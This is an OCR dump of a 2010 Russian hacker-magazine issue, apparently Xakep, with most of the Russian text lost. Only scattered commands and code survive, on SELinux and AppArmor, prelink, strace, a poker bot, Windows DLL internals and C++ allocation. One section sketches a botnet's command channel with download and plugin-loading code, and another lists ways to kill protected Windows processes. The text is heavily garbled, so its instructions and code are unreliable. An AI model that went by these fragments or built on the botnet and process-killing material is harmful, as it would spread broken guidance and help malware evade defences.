# grep -iR httpd /etc/selinux/targeted/contexts
, .
SELinux: getsebool -a.
setsebool ( '-P'
) system-configsecuritylevel.
sestatus -v .
:
# dmesg | grep -i selinux
SELinux: Initializing.
SELinux: Starting in permissive mode
# grep -iR selinux /var/log/messages
X 08 /139/ 10
Application Armor Immunix Inc.

, Novell ,
GNU GPL,
openSUSE. AppArmor .
Immunix Novell,
. openSUSE AppArmor
, SELinux.
- AppArmor is dead,
,
,
.
Canonical, AppArmor. ,
, .
, ,
initramfs. Ubuntu AppArmor
LSM (Linux Security Modules), security_path
vfs.
AppArmor ,
. SELinux, AppArmor
.
(profiles),
,
. . :
SELinux , AppArmor , . ,
, ,
. . ,
SELinux
, AppArmor .

, AppArmor
, . ,
aa-genprof aa-logprof, . AppArmor init-, , securityfs.
$ sudo /etc/init.d/apparmor start
,
/sys/kernel/security/apparmor/profiles ( /etc/init.d/
apparmor status); Server/
Desktop .
( ) /etc/
apparmor.d ,
. .
. AppArmor
enforce-. , .
091
UNIXOID
TOMOYO Linux
complain,
. , SELinux,
, AppArmor
.
:
flags=(complain);
complain _ ( enforce);
echo 1 > /sys/kernel/security/apparmor/
control/complain.
, , ,
. , AppArmor , .

(apt-cache search apparmor), , -
apparmor.opensuse.org.
, 2.4/2.6 Trustees (trustees.
sf.net), ACL a- Novell Netware,

. ,
, SELinux AppArmor.
TOMOYO LINUX
TOMOYO Linux (tomoyo.sf.jp) 2003 NTT DATA CORPORATION MAC Linu. GNU GPL
SF.net.
. 2.6.30,
TOMOYO Linux ,
.
TOMOYO Linux. ,
TOMOYO Linux
2.4 2.6. ( )
LSM, 1.: , ,
POSIX- ( ).

,
Mandriva. ,
Tomoyo GUI,
.

. , Ubuntu 10.04:
$ sudo echo 'deb http://osdn.dl.sourceforge.jp/
tomoyo/47128/ ./' >> /etc/apt/sources.list
$ sudo apt-get update
$ sudo apt-get install linux-ccs ccs-tools
, Enable
different security models TOMOYO Linux Support Security
options.
TOMOYO AppArmor. (pathname based), .
. , TOMOYO
, . , , SSH, ,
. , , (UID/GUD).
TOMOYO (domains).
TOMOYO /etc/tomoyo,
/proc/tomoyo,
. TOMOYO /etc/tomoyo/profile.conf /proc/tomoyo/profile.
TOMOYO disable, permissive,
enforsing learning (, ).
:
manager.conf (/proc/tomoyo/manager) ,
/proc/tomoyo;
exception_policy.conf (/proc/tomoyo/exception_policy)
;
domain_policy.conf (/proc/tomoyo/domain_policy) ;
meminfo.conf (/proc/tomoyo/meminfo)
.
ccs-tools
TOMOYO, /usr/lib/ccs/tomoyo_init_police.sh,
. .
:
# /usr/lib/ccs/editpolicy /etc/tomoyo/
TOMOYO
SELinux AppArmor.z
092
X 08 /139/ 10
UNIXOID
zobni n@gmail.com
Linux
Linux .
, ,
, 500 ,
,
. ,
, ,
? .
(,
GTK+ 2.X, X Free 4.X
Linux 2.6)
.
,
.
-
094
, .
PRELINK
- ,

. ?

. a.out,
.
a.out , ,
X 08 /139/ 10
WARNING
warning

update-initramfs
prelink
Ubuntu
.

,
DT_GNU_HASH

(glibc).
Readahead bootchart
, .. ,
, ,
(,
?). ,
ELF (
:)),

.
, (,
, ..)
.
ELF UNIX/Linux
, ,
, .
.
,
, ,
,

50 ,
( ).
- ELF- a.out.
,
, ,

.
-
Red Hat Jakub Jelinek 2004
. , , 50%
,
(OpenOffice, KDE, Gnome) .

.
, - . Jakub Jelinek
prelink.
Linux-,
.
prelink, ,
:
# prelink -avmR
X 08 /139/ 10
:
v ;
a -
;
m (,
);
R (
).

.
:
1. Prelink , '-fPIC'. ,
, ;
2. Prelink wine,
Windows- ;
3.
prelink;
4. .
prelink :
# prelink -au
PRELOAD
prelink preload,
. ,
preload
.

,
.
preload , ,

. , preload
INFO
info

prelink
Mac OS X.

prebinding.
preload
Windows
Prefetcher
( SuperFetch) ,
Windows XP.

init,
Ubuntu

upstart,

15-20
.
cryopid.berlios.de

CryoPID.
people.redhat.com/
jakub/prelink.pdf
Prelink
.
behdad.org/preload.
pdf Preload .
www.checkpointing.
org
.
dmtcp.sourceforge.net
095
UNIXOID
, .
preload ,

:
$ sudo apt-get install preload
/etc/preload.
conf. ,
-,
, , preload .
model:
cycle .
20 .
, , preload , .
halflife , preload
50%.
168 (). ,
, , /
.
minsize (, ), preload. 2 000 000
( 2 ), preload .
, ,
.
memtotal, memfree, memcached
preload . : ( memtotal) +
(, memfree) + ( memcached).
system :
mapprefix , ( , , ).
exeprefix .
sortstrategy -.
3 ( ).
1, 2.
, preload:
$ sudo /etc/init.d/preload reload
, preload ,
/val/log/preload.log.
preload /var/lib/preload/preload.state.
READAHEAD
Ubuntu, Linux,
readahead .
preload, readahead
.
, readahead
Linux .
/sbin/readahead-list,
/etc/readahead/boot /etc/readahead/desktop . , , , .
, Ubuntu
. . profile .
096

Preload
, <Esc>
, <e>
profile. <b> . , .
CRYOPID
.
, jabber- .
, .
,
,
,
? , . CryoPID
.
root , x86
amd64 , ,
. -
,
. CryoPID
, :
$ cd /tmp
$ wget http://dagobah.ucc.asn.au/wacky/cryopid-0.5.9.1i386.tar.gz
$ tar -xzf cryopid-0.5.9.1-i386.tar.gz
$ cd cryopid-0.5.9.1/src
$ make
$ mkdir ~/bin
$ cp freeze ~/bin
:
$ ~/bin/freeze - pid-
, CryoPID ,
X-,
.
UBUNTU
Ubuntu , . BSD-. ,
.
X 08 /139/ 10
OpenOffice.org
Ubuntu
1. grub. 3 ,
.
/boot/grub/menu.lst, timeout=3 3 0.
2. splash. Ubuntu splash-screen,
, .
/boot/grub/menu.lst
quiet splash .
3. IPv6. IPv6
Linux ,
/etc/
modprobe.d/aliases. IPv6 ,
ipv6.disable=1. , /boot/grub/menu.lst.
4. .
,
(suspend) . , ,
noresume . , .
5. initramfs. RAM- ,
.
,
. ,
.
/etc/initramfs-tools/initramfs.conf, MODULES=most
MODULES=dep.
:
$ sudo update-initramfs -k all -u
.
6. . Ubuntu
.
, . System Administration
Services .
, :
Bluetooth Manager Bluetooth
Check for new hardware drivers

X 08 /139/ 10
Evolution Alarm Notifier

Evolution
Print Queue Applet
Tracker
7. .
( ). ,
System Preferences Applications startup
, (,
bluetooth).
:
, :
sh -c "sleep 10; exec bluetooth-applet"
sh -c "sleep 20; exec /usr/lib/evolution/2.28/
evolution-alarm-notify"

10. DE .

, ,
.
, . .
OpenOffice.org.
,
. Tools Options,
Memory. Number of
steps 20, .
Graphics cache Use for OpenOffice.
org 128, Memory per object 20. Java
Use a Java runtime environment.
.
Firefox.
. ,
,
.
. , . sqlite,
:
$ find ~/.mozilla/firefox/ -name *.sqlite \
-exec sqlite3 {} VACUUM \;
(, ),
.z
097
UNIXOID
Adept adeptg@gmail.com

strace
: ,
.
. ! ,
, .
, ,
,
-.

strace. ,
#10 2009 ( ), , strace
-
098
, ,
. Strace
:

- ;
-
- ;
strace
, tcpdump,
;
( /dev/random /dev/
X 08 /139/ 10
WARNING
warning

Firefox 1
strace Firefox
audit) strace ;
,
. , , AppArmor
chroot.
strace :
$ strace uname
execve("/bin/uname", ["uname"], [/* 36 vars
*/]) = 0
brk(0) = 0x1ed2000
access("/etc/ld.so.nohwcap", F_OK) = -1
ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7fb79f08a000
access("/etc/ld.so.preload", R_OK) = -1
ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_
size=133660, ...}) = 0
### , /usr/
lib/locale/ru_RU.utf8
uname({sys="Linux", node="adept-laptop",
...}) = 0
strace stderr,
. strace
'-o':
access:
.
(
F_OK).
-1 () ENOENT
(No such file or directory). ,

.
, access
, -
.
open,
(O_RDONLY, O_WRONLY O_RDWR).

, ( ,
close).
open
read write.
,
/ .
fstat
( inode, uid, gid ..)
uname, .
uname ,
.
. . , open access (

):
$ strace -e trace=open,access \
-o strace.log uname

, : file, process, network, signal
ipc. , .
, mmap:
$ strace -e trace=\!mmap -o strace.log uname
$ strace -o uname.strace uname
execve: .
( ) , . strace
,
'-v'. 0 ok.
-1.
X 08 /139/ 10
,
.
.
strace ,
'-f'.
strace ,
'-ff', strace
filename.PID.

ldd

. ,
, :
www.catonmat.net/
blog/ldd-arbitrarycode-execution/.

readelf.
HTTP://WWW
links
strace.sourceforge.
net
www.ltrace.org
github.com/rvoicilas/
inotify-tools
INFO
info

.
Linux
2.6 400
.

man. ,

open
: man
2 open.
strace

ptrace.

ltrace.
099
UNIXOID
Inotify:
strace ,
.
. inotify. Inotify ,
.
2.6.13 ( 2005). Inotify , , ( Beagle),
, incron.
Incron cron , , .
(incron ) /etc/incron.allow,
,
incron.
:
$ incrontab -e
:
<> <> <> (
)

IN_ACCESS
IN_ATTRIB /
IN_MODIFY
IN_CREATE
IN_DELETE
IN_DELETE_SELF
IN_MOVE
IN_ALL_EVENTS
. :
$@ /
$# ,
( )
$%
strace:
'-p' PID
. , '-p' .
apache:
# strace -f $(pidof apache2 | sed 's/$[0-9]*$/\-p
\1/g')
strace,
,
.

-, 1.3, PHP 4,
.
100
OpenOffice
PHP mail . ,
. apache,
PHP sendmail , ,

Strace ( system trace) , BSD- . 1991
SunOS trace. Linux
, . 1992 2.5 SunOS, Linux
1.5. 1993 strace 2.5 SunOS strace Linux,
truss SVR4.
strace, Linux, SunOS. 1994
strace SVR4 Solaris, 1995 Irix. strace ,
.
4.5.20 14 2010 . strace ,
.
, strace
DTrace Sun Microsystems, Solaris, FreeBSD
Mac OS X (10.5 ). Linux.
ktrace FreeBSD, OpenBSD, NetBSD Mac OS X (
10.5).
Inotify-tools
Incron , inotify
inotify-tools, inotifywait inotifywatch,
. Inotifywait

.
man', inotifywait:
$ cat ~/script.sh
while inotifywait -e modify \
/var/log/apache2/error.log; do
tail -1 /var/log/apache2/error.log | \
notify-send "Apache needs love!"
done
Inotifywatch /
.
,
.
X 08 /139/ 10
ldd Firefox
. strace. :
, Firefox
# strace -f -o /tmp/apache2.strace \
/etc/init.d/apache2 start
, ( mail.
php) , apache ,
.
$ grep mail.php /tmp/apache2.strace
5345 read(9, "GET /mail.php HTTP/1.1\r\nHost:
12"..., 8000) = 397
5345 stat("/var/www/mail.php", {st_mode=S_
IFREG|0644, st_size=256, ...}) = 0
5345 lstat("/var/www/mail.php", {st_mode=S_
IFREG|0644, st_size=256, ...}) = 0
5345 open("/var/www/mail.php", O_RDONLY) = 10
PID, , , .
,
. , grep mail.php , PID- (5345), . ,
grep PID:
$ grep 5345 /tmp/apache2.strace
5340 clone(child_stack=0, flags=CLONE_CHILD_
CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_
tidptr=0x7f3bf2eada10) = 5345
5345 read(9, "GET /mail.php HTTP/1.1\r\nHost:

12"..., 8000) = 397
5345 stat("/var/www/mail.php", {st_mode=S_
IFREG|0644, st_size=256, ...}) = 0

.
clone
PID 5347. , ! :) Grep 5347:
X 08 /139/ 10
$ grep 5347 /tmp/apache2.strace

5347 execve("/bin/sh", ["sh", "-c", "/usr/sbin/

sendmail -t -i "], [/* 6 vars */] = -1 EACCES
(Permission denied)
! /usr/sbin/sendmail,
. sendmail
, /bin/sh . -
, /bin/sh 770 (
root), www-data ( apache)
.
.

strace ,
tcpdump. , strace ,
.
IP , , ,
dig IP, firefox
. :
$ strace -f -e trace=network firefox xakep.ru
7879 socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_
NONBLOCK, 0) = 3
7879 connect(3, {sa_family=AF_FILE, path="/var/run/
nscd/socket"}, 110) = 0
7879 sendto(3, "\2\0\0\0\v\0\0\0\7\0\0\0passwd\0",
19, MSG_NOSIGNAL, NULL, 0) = 19
connect , Firefox NSCD ( ) ,

, NSCD DNS.
101
UNIXOID
# ldd /usr/local/nginx/sbin/nginx
linux-gate.so.1 => (0xb7789000)
libcrypt.so.1 => /lib/i686/cmov/libcrypt.so.1
(0xb7751000)
libpcre.so.3 => /usr/lib/libpcre.so.3 (0xb7728000)
libssl.so.0.9.8 => /usr/lib/i686/cmov/libssl.
so.0.9.8 (0xb75d4000)
libcrypto.so.0.9.8 => /usr/lib/i686/cmov/libcrypto.
so.0.9.8 (0xb7cde000)
libz.so.1 => /usr/lib/libz.so.1 (0xb75bf000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7464000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7460000)
/lib/ld-linux.so.2 (0xb778a000)
chroot-
(, /chroot/nginx). , ,
, ldd
.
nginx' .
:
Firefox
NSCD , , .

, - ,
kill. , , , . :
Debian Etch, squid NCSA SAMS . SAMS squid
.
# strace -f -o /tmp/samsdaemon /etc/init.d/samsd start
15773 13:16:03 stat64("/etc/squid/ncsa.sams", {st_

mode=S_IFREG|0644, st_size=314, ...}) = 0
15773 13:16:03 open("/etc/squid/ncsa.sams", O_
RDONLY|O_APPEND|O_LARGEFILE) = 3
15773 13:16:03 close(3) = 0
15773 13:16:03 open("/dev/random", O_RDONLY) = 3
15773 13:16:03 read(3,
, .
, /dev/random. SAMS
. /dev/urandom, , /dev/random.
NGINX
,
.

chroot.
, strace
ldd ( ELF). , chroot
- nginx.
, nginx (
0.8.40)
/usr/local. , :
102
# strace -e trace=open /usr/local/nginx/sbin/nginx

open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/i686/cmov/libcrypt.so.1", O_RDONLY) = 3
open("/usr/lib/libpcre.so.3", O_RDONLY) = 3
open("/usr/lib/i686/cmov/libssl.so.0.9.8", O_RDONLY)
= 3
open("/usr/lib/i686/cmov/libcrypto.so.0.9.8",
O_RDONLY) = 3
open("/etc/passwd", O_RDONLY|O_CLOEXEC) = 4
open("/etc/group", O_RDONLY|O_CLOEXEC) = 4
open("/usr/local/nginx/logs/access.log", O_WRONLY|O_
CREAT|O_APPEND|O_LARGEFILE, 0644) = 4
open("/usr/local/nginx/logs/error.log", O_WRONLY|O_
CREAT|O_APPEND|O_LARGEFILE, 0644) = 5
,
(, /etc/
passwd).
chroot- /dev/null, nginx':
# mknod /chroot/nginx/dev/null c 1 3
. nginx chroot :
# chroot /chroot/nginx/ /usr/local/nginx/sbin/nginx
strace . -,
,
( apache production ) .
32-
64- . , ,
,
( , , ).
, strace ,
.
, , gdb.z
X 08 /139/ 10
CODING
c0n Difesa condifesa@gmail.com, http://defec.ru

-
. -

.

DDoS-,
.
? , -
, TAN (Transaction authentication number,
-), .
-.
,
, .
- ,
. -
.
, .
.
. , ,
-. . , , .

. -.
:
- -.
(,
Zeus).
Instant Message
IM- (ICQ, jabber, MSN ..). -
.
104
IRC IRC-.
.
-
() .
Twitter-
-. ,
-, API. , ,
- ,

.
TCP/IP-based ,
TCP/IP. ,
.

( ):
(
);
P2P ( ).

, .

. , , /
,
.
-
:
(
,
);
X 08 /139/ 10
>> coding
Bot
Master
Bot
Bot

(
, ).

-. , , - , :
1) Peer-to-peer .
, ( )
IP ,
;
2)
,
;
3)
(P2P) , , ;
4) ( /
).

P2P- . ,
.
,
,
, ,
- .
.
,
-
, ,
.
, :

int generator (int seed) {

srand(seed);
/*
*/
for (x = 1; x <= 20; x++)
printf("iteration %d, rand=%d\n", x, rand());
getch();
return 0;
}
X 08 /139/ 10
DDoS
,
,
srand() rand(). seed srand()
, , ,
rand().
generator() seed=123:
440
19053
23075
, seed , .

,
.

. ,
.
: , , , .
,

. , -
( seed),

.

.
.
(
).
.NET

. , ,
105
CODING
Master
Bot

.
, ,
.
][ ONLINE -
ASP.NET. ,
-
. -,
, ( ) ().
- .

:
, ;
,
.

- Config.Web :
<configuration>
<security>
<authentication mode="Cookie"/>
</security>
</configuration>

Cookies-. (UserLogin UserPassword), , , cookies-, ,
:
<script language="C#" runat= server>
void Login_Click(Object sender, EventArgs E) {
if ((UserLogin.Value == "DotSiteTeam")
&& (UserPassword.Value == "BestITResource")) {
CookieAuthentication.RedirectFromLoginPage(
UserLogin.Value,true);
}
else {
//
}
}
</script>
ASP.NET , ,
URL,
: URL File.
, -
106
Bot
Bot
Bot
Bot
Bot

.
, URL
, , :
<authorization>
<allow users="*" />
<deny users="?" />
</authorization>
, , ,
- ASP.NET, ,
.

. ? , , -
,
. . ,
:
1. ;
2. ,
;
3. ;
4. .

(command.txt).
HTTPDownload(char *FileUrl, char *FileName). .dll .
, ,
, Windows: wininet.dll.
DLL API
, FTP, HTTP Gopher. API,
, WinSock TCP/IP, -.
X 08 /139/ 10
>> coding
INFO
info

,
.
,
:
, ,
. :

<(1)> [(1)] [(2)]
[(i)]
<(2)> [(1)] [(2)]
[(j)]
<(k)> [(1)] [(2)]

[(n)]
i, j, k (1; ).
:
1. k- ;
2. , , ( PlugLibrary());
3. PlugLibrary() , .
command.txt Parse(char
*FileName).
dll
, PlugLibrary

(
dll):
//
hPlugin = LoadLibrary(DllName);
// (DefType)
typedef int (*DefType)(char *);
/* Load,
*/
DefType Load = (DefType)
X 08 /139/ 10
GetProcAddress(hPlugin,"Load");
/* "Load"
*/
int iCode=(*Load)(Parametrs);
Load, ,
,
-.
.
:
-,
,

, ,

. , :
,
, .
, ,
. z
Web 2.0

.

.
DVD
dvd

MS Visual Studio 2010.
HTTP://WWW
links
http://www.xakep.
ru/magazine/
xa/128/056/1.asp

:
.
http://msdn.
microsoft.com/ru-ru/
library/dd335939.
aspx

web ASP.
NET
http://defec.ru
,

,

.
107
CODING
Tim timreset@mail.ru, javatalks.ru
.
,
Holdem No Limit Poker
PokerStars.

. .
Ilogic IEventSimulation. , .
,
,
ILogic
.
int getAnswer(float p, float totalBet, float curBet,
float pot, int betting, int minRaise), 0,
(fold), 1 (call) 2
(raise).
,
.
: p (
poker room ]
[ ), totalBet
, curBet ,
, pot , betting ,
minRaise , . .

. IEventSimulation , .
:
108
changeBoardCard(int[] board)
, changePot(int pot)
, changeMoneyOfPlayers(int[]
money) , postDillerMessage(String message)
, changeDillerPosition(int
posOfDealer) ,
changePlayerStatus(int player, int status, int[] hand)
.
,
. , . ,
PokerStars
,
, . Holdem Poker PokerStars.
NoLimit Limit, -
.
: AggressiveLogic ( ),
CautiousLogic ( ), RationalLogic ( ), RaiseLogic ( ), CallLogic
( ), FoldLogic ( ),
RandomLogic ( ).
AggressiveLogic, CautiousLogic RationalLogic
X 08 /139/ 10
>> coding
HoldemConsole
HoldemForm
p*pot = win win .

, , (

). , CautiousLogic ,
, AggressiveLogic ,
. HoldemForm swinge
IEventSimulation ILogic.
, , , ..
,
Fold, Call Raise.
,
, .
HoldemConsole .
, ,
(playersList). ,
: trade(int betting) ,
startGame() , , int
getSinglePlayer() ,
, int getActivePlayer()
. set setBigBlind(int
bigBlind), setRoundCount(int roundCount).
, ,
, , ,
, , .
,
, ,
. .
. :
1) ;
2) ( );
3) ;
4) ();
5) ;
6) ();
7) ;
8) ();
9) ;
10) .
, ,
. , .
, , .
, .

.
, . -, :
(moneyOfPlayers), (handOfPlayers) (
) stateOfPlayers. -,
(posOfDealer), (pot), (bigBlind) (board).
,
(totalBet). X 08 /139/ 10
STARTGAME
,
:
,
, . :
, (
), .
,
.
,

. , , ,

, .
:
x = (x + 1) % 9;
x 0 8-9.
.
TRADE
109
CODING
== maxBet)) {
continue;
}
if (moneyOfPlayers[curPlayer] == 0) {
continue;
}

. 1 (-), 2 (), 3 (), 4
(). ,
,
. .
-

public int getAction(float p, float totalBet, float
curBet, float pot, int betting, int minRaise) {
if (curBet == 0) {
btnCall.setText("Check");
} else {
btnCall.setText("Call " +
String.valueOf(curBet));
}
btnCall.setVisible(true);
btnFold.setVisible(true);
btnRiase.setVisible(true);
btnRiase.setText("Raise " +
String.valueOf(curBet + minRaise));
frame.repaint();
action = -1;
while (action == -1) {
try {
Thread.sleep(500);
} catch (InterruptedException e) {
e.printStackTrace();
}
frame.repaint();
}
btnCall.setVisible(false);
btnFold.setVisible(false);
btnRiase.setVisible(false);
frame.repaint();
return action;
}
: ,
. , (
),
.

//
curPlayer = (curPlayer + 1) % 9;
if (getSinglePlayer() != -1) {
break;
}
if (stateOfPlayers[curPlayer] == false) {
continue;
}
if ((repeatTrade == true) && (betOfPlayers[curPlayer]
110
. ,
ILogic :

float p=logic.getProbabilityOfWin(
handOfPlayers[curPlayer], board,getActivePlayers());
int action=playersList.get(curPlayer).getAction(p,
totalBet[curPlayer] + betOfPlayers[curPlayer],
maxBet-betOfPlayers[curPlayer],pot,betting,
maxBet==0?bigBlind:maxBet);
:
, (,
) .
getAction ;
;
, ,
,
;
; , ,
. ,
, .
( action) .
: fold, ;
call, , ,
all-in, ,
, , ; raise,
,
, .
,
, , (all-in). ,
. -
, ,
.
.
:
HoldemForm
List<ILogic> playersList=new ArrayList<ILogic>();
playersList.add(frame);
playersList.add(new FoldLogic());
playersList.add(new CautiousLogic());
playersList.add(new CallLogic());
playersList.add(new RationalLogic());
playersList.add(new AggressiveLogic());
playersList.add(new CautiousLogic());
playersList.add(new RaiseLogic());
,
,
X 08 /139/ 10
>> coding
playersList.add(new RandomLogic());
playersList.add(new RaiseLogic());

:
http://www.pokerbonus.org.ua/menu/pravila.html
http://www.tehasskiy-holdem.info/
http://www.pokerstars.com/ru/poker/games/
texas-holdem/
:
http://poker-wiki.ru/poker/_
_
:
http://poker-wiki.ru/
50 15 .
, .
49 ( $750):
1-
2-
3-
4-
5-
6-
7-
8-
9-
$580
$590
$570
$2220
$570
$680
$0
$750
$790
INFO
info

,

HoldemForm,

.
:
. , , , fold, call raise.
,
, ,
. ,
. - ,
,
timreset@mail.ru
,
, :
1) .
.
2) HoldemForm ,
changeDillerPosition . -
.
3) .
.
4) .
float . Int -
, , .
5)
.
. .
6) .
.
7) ,
, .
, . (-
,
, ),
. ,
, HoldemConsole.
:
HoldemConsole
playersList.add(new
playersList.add(new
playersList.add(new
playersList.add(new
playersList.add(new
playersList.add(new
X 08 /139/ 10
RationalLogic());
FoldLogic());
CautiousLogic());
CallLogic());
CautiousLogic());
AggressiveLogic());
1-
2-
3-
4-
5-
6-
7-
8-
9-
$570
$560
$580
$2450
$590
$1110
$0
$890
$0
.
,
CallLogic, RaiseLogic (
) AggressiveLogic ( ).
?
RationalLogic , , ? , ,
, ,
.
,
( )
. ,
, .
, , ,
, .
CallLogic, RaiseLogic AggressiveLogic.
,
. , .
SB minRaise,
minRaise ,
.
, . , , ,

:)
. ,

-
. z
DVD
dvd

.
JavaDoc

,
.

.
HTTP://WWW
links

http://poker-wiki.ru
111
CODING
aleksandr-ehkkert@rambler.ru
WINDOWS

,
. , ,
, .
.

,
.
, , - . Windows,
:). ,
Windows. , ,
,
.
,
, ,
.
, .
,
,
. ,
, ,
Windows . , .
LPRESERVED DLLMAIN
DllMain:
BOOL WINAPI DllMain(
__in HINSTANCE hinstDLL,
112
__in
__in
);
DWORD dwReason,
LPVOID lpReserved
( ) .
, ? ,
lpReserved,
? , Microsoft.
MSDN , / ; ,
. , , lpReserved .
: lpReserved , , !
:
APC AsyncProcedureCall,
LdrInitializeThunk, Ntdll.dll.
, LdrInitializeThunk,
CONTEXT, , .. APC,
LdrInitializeThunk. ntdll!LdrInitializeThunk,
, CreateThread.
X 08 /139/ 10
>> coding
ntdll.dll kernel32.dll explorer.exe firefox.exe

( !),
CreateThread APC
LdrInitializeThunk .
: , dwReason DLL_
PROCESS_ATTACH ( ), lpReserved
NULL non-NULL
.
, fdwReason DLL_PROCESS_DETACH
( ), lpReserved NUL
FreeLibrary DLL, nonNULL .
Microsoft ? ,
:). ,
! ? ?
SetThreadContext ? ,
. -, CONTEXT
.
CONTEXT ( ).
DEBUG- .
, , TF EFLAGS
-, lpReserved->Eip .
,

.
, .
DLL
, ,
ntdll.dll, kernel32.dll user32.dll
, Microsoft . ?
,

. , ntdll.dll
. .

. ,
ntdll!LdrInitializeThunk. ntdll!KiUserApcDispatcher
X 08 /139/ 10
,
.

. ,

( ), ntdll.dll . Kernel32.dll
,

. , kernel32.dll
( Ctrl+C ,
?). , Ctrl+C
. user32.dll ,
, win32k.sys
, Windows.
win32k.sys
NtUserInitializeClientPfnArrays .
DVD
dvd
DVD

WinDBG,
Windows,
-
,

.
? - !

? , ,
. .
( ) Win32-
,
. , CSRSS

Ctrl+C/Ctrl+Break.
-, Win32-API-
.
, WSAAsyncGetHostByName
gethostbyname ,

.
X86 WOW64
HTTP://WWW
links
Windows

.

,
www.alex-ionescu.
com http://j00ru.
vexillium.org.
Wow64 32- dll, Win32 API-
113
CODING
32- EXE-DLL
32- Ntdll. dll
, ,
32-
Wow64,
GetThreadContext/SetThreadContext, .

Wow64. , THREAD_QUERY_
INFORMATION.
12
Wow64c pu.dll
Wow64.dll
Wow64win.dll
64- Ntdll. dll
Ntoskrnl.exe
wow64
( Wow64-).
32- dll Wow64-?
64- Windows dll 32- 32- . , Wow64-
ws2_32.dll Vista x64 , 32- ws2_32.
dll Vista x86. , dll , , ntdll.dll.
x86 ntdll.dll,
,
SystemCallStub SharedUserData:
lkd> u ntdll!NtClose
ntdll!ZwClose:
mov
eax,30h
mov
edx,offset SharedUserData!SystemCallStub
call dword ptr [edx]
ret
4
Wow64- ntdll . 0xc0 32-

TEB (Thread Environment Block):
lkd> u ntdll!NtClose
ntdll!ZwClose:
mov
eax,0Ch
xor
ecx,ecx
lea
edx,[esp+4]
call dword ptr fs:[0C0h]
ret
4
, TEB 0xc0
, WOW32Reserved:
lkd> dt ntdll!_TEB
+0x000 NtTib
[skip...]
+0x0c0 WOW32Reserved
114
: _NT_TIB
: Ptr32 Void
, ,
12 :
1) TerminateProcess NtTerminateProcess
, , ;
2) CreateRemoteThread ExitProcess.
ExitProcess , ;
3) NtQuerySystemInformation toolhelp32
TerminateThread or NtTerminateThread. TerminateThread (NtTerminateThread);
4) NtQuerySystemInformation toolhelp32, SetThreadContext EIP ,
ExitProcess;
5) 0 4096 DuplicateHandle TargetProcess TargetProcessHandle NULL, Options
0x1. ,
.
, , notepad.exe;
6)
CreateJobObject, AssignProcessToJobObject TerminateJobObject;
7) , NtCreateDebugObject ,
NtDebugActiveProcess, -
( ) CloseHandle;
8)
VirtualQueryEx PAGE_NOACCESS
VirtualProtectEx. ,
;
9) VirtualQueryEx,
WriteProcessMemory
;
10)
VirtualQueryEx. ,
;
11) PsTerminateProcess (PspTerminateProcess).
, ;
12)
PspTerminateThreadByPointer. ,
.
, ,
PspTerminateThreadByPointer
, .
, , . .
,
, Windows
.
. ! ,
! z
X 08 /139/ 10
CODING
deeonis deeonis@gmail.com
C++
++ , ,
. ? :).
NEW DELETE, ,

,
.
, C++ ,
, ,
.
. , , (, Java C#),

,

.
, , , ,
C++. ,
. ,
. ,
, , .

.

new delete?
,
. new delete
, .
, , . ,
. ,
delete. , delete
. .
,
X 08 /139/ 10
.
.
,
, ? , . new
. delete
, , .
, - , .
new delete, ,
.
, ,
, .
,
, ,
.
, ,
.
, new delete

, .

, . , , new delete
,
, ;
( ), ..
new delete
. -
115
CODING
CODING
PREDIDENTUA / HTTP://TUTAMC.COM/
, C++

, :
, ,
,

, - .

.
new
new delete . , ,
new . ,
, .
new
static const int signature = 0xADADEAEA;
typedef unsigned char Byte;
void *operator new(std::size_t size)
throw(std::bad_alloc)
{
using namespace std;
size_t realSize = size + 2 * sizeof(int);
void *pMem = malloc(realSize);
if (!pMem)
throw(bad_alloc);
*(static_cast<int>pMem)) = signature;
*(reinterpret_cast<int*>(static_cast<Byte*>(pMem)
+ realSize sizeof(int))) = signature;
return static_cast<Byte*>(pMem) + sizeof(int);
}
malloc
, ,
, .
, , . , .
, ,
, , double
. , .
C++ , , new,
116
++
. malloc
, , ,
, , ,
, , .
double , int
, new, ,
,
.
, , .
new, - new.
- new
new , .
new
.
new,
.

, new - (newhandler), . ,
set_new_handler,
<new> :
set_new_handler
namespace std {
typedef void (*new_handler) ();
X 08 /139/ 10
.
abort exit, , ,
. new,
.
,
set_new_handler new. set_new_handler new ,
operator new ,
new ,
.

new_handler set_new_handler(new_handler p)
throw();
}
, new_handler typedef ,
, set_new_handler
, new_handler. new
.
(set_new_handler). :
set_new_handler
void outOfMem()
{
std::cerr << " \n";
std::abort();
}
int main()
{
std::set_new_handler(outOfMem);
int *pBigDataArray = new int[100000000L];
...
}
new ,
. - ,

. .
. new-handler
, , ,
- , .
set_new_handler , new
.
- new bad_alloc , .
new,
X 08 /139/ 10
new
class Widget {
public:
static std::new_handler set_new_handler
(std::new_handler p) throw();
static void *operator new(std::size_t size)
throw(std::bad_alloc);
private:
static std::new_handler currentHandler;
}
new, Widget,
. -,
set_new_handler, Widget. new-handler
. operator new.
new, Widget.
, new ,
new . , new,
Widget,
new-handler.
,
.
. C++ ,
, , ,
..
,
.

. ,
, .
.
, , ,
new delete,
open source . ,
Pool Boost. ,

C++.
,
new delete. ,
.z
117
SYN/ACK
grinder grinder@synack.ru, _ssh3r1ff- ssh3r1ff@gmail.com

, , . , : !.
WINDOWS
Windows , IP- . , advfirewall
MMC ( ),
. , , .
netsh,

. netsh *.wfw,
. , advfirewall
. , IP
URL, . , IE ,
: ,
, , .
DNS.
,
IP , HOSTS ( c:\Windows\System32\drivers\etc\hosts)
. :
127.0.0.1
127.0.0.1
odnoklassniki.ru
www.odnoklassniki.ru
, , , .
, .
: NAT,
VPN-, , ,
P2P- . KWF - ,
][ 2007 ,
.
. ->
. KWF ,
,
URL HTTP FTP
. , . ,
,
, . ,
,
, - . -> URL,
URL, . , Ads/banners, Search engines,
Automatic Updates Windows Update. .
, ,
(, Social network), (URL URL)
:
odnoklassniki.ru/*
,
:
*.odnoklassniki.ru/*
KERIO WINROUTE

Kerio WinRoute, -
118
,
. , X 08 /139/ 10
, (- dostupest.ru).
HTTP
.
,

, .
-> -> HTTP.
, URL,
. , .
,
